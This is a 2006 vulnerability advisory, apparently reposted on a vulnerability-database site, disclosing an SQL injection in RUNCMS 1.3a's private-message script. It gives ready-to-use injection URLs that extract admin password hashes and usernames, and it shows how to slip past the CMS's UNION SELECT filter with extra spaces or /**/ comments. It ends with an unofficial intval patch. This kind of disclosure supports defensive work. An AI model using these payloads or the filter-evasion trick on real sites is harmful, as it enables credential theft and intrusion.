Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11493
HistoryFeb 18, 2006 - 12:00 a.m.

RUNCMS 1.3a SQL injection

2006-02-1800:00:00
vulners.com
286
JSON

refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/

RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and …
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org

Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?)

Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]

http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php
and you will see this warning:

            " WARNING !!!!!! You were trying to abuse the

system, a logfile was created …"

what is the problem ?
Bypassing Protection :
as i underestand RUNCMS just filter (union select)
and (union all select) and …! but they forgot
(union select) !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection simply add " /**/ " in your query
exploit will be something like this :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir

Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];

Signature

Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

JSON